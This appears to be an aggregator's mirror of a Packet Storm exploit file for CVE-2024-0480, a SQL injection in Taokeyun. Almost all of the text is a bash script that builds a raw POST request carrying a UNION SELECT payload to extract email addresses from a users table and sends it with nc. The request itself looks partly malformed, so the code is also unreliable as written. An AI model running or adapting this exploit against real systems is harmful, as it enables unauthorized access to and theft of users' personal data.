Taokeyun SQL Injection
2024-1-15 21:43:48 Author: packetstormsecurity.com(查看原文) 阅读量:5 收藏

#!/bin/bash

# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"

# Construct the request
request="POST $url HTTP/1.1\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: $((${#cid}+15))\r\n\r\n"
request+="$cid"

# Send the request
(echo -e "$request") | nc example.com 80


文章来源: https://packetstormsecurity.com/files/176548/CVE-2024-0480.sh.txt
如有侵权请联系:admin#unsafe.sh